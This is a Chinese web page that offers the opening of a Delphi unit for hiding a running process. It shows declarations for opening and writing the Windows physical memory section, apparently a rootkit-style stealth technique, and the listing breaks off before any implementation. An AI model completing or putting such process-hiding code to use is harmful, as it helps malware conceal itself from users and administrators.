admin 管理员组

文章数量: 1184232
进程隐藏的Delphi代码


unit UnitHideProcess;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;

type
NTSTATUS=Longint;
USHORT =Byte;
PWSTR=PWidechar;
ULONG= Cardinal;
HANDLE=Pointer;
PVOID=Pointer;
PCWSTR=PWidechar;
PULONG=^ULONG ;
HMODULE=THANDLE;

const
STATUS_ACCESS_DENIED = $C0000022 ;
RSP_SIMPLE_SERVICE = $00000001;
RSP_UNREGISTER_SERVICE = $00000000 ;
type
_UNICODE_STRING= record
Length:USHORT ;
MaximumLength: USHORT;
Buffer:PWSTR;
end;
UNICODE_STRING= _UNICODE_STRING;
PUNICODE_STRING =^ _UNICODE_STRING ;

_OBJECT_ATTRIBUTES =record
Length:ULONG ;
RootDirectory:HANDLE;
ObjectName:PUNICODE_STRING;
Attributes:ULONG;
SecurityDescriptor:PVOID;
SecurityQualityOfService:PVOID ;
end;
OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES;

ZWOPENSECTION=function(
SectionHandle:PInteger;
DesiredAccess:ACCESS_MASK;
ObjectAttributes :POBJECT_ATTRIBUTES
): NTSTATUS; stdcall;
RTLINITUNICODESTRING=procedure(
DestinationString:PUNICODE_STRING;
SourceString :PCWSTR
);stdcall;

TMyHideProcess=class
private
OSversion:Longint;
RtlInitUnicodeString:RTLINITUNICODESTRING ;
ZwOpenSection:ZWOPENSECTION;
g_hNtDLL: HMODULE;
g_pMapPhysicalMemory:PVOID;
g_hMPM :THANDLE ;
function InitNTDLL():bool;
procedure CloseNTDLL();
procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ; <

本文标签: 编写绝密 利用 从零开始

版权声明:本文标题:从零开始:利用Delphi编写绝密代码隐藏你的进程 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/p/1770603888a3535547.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。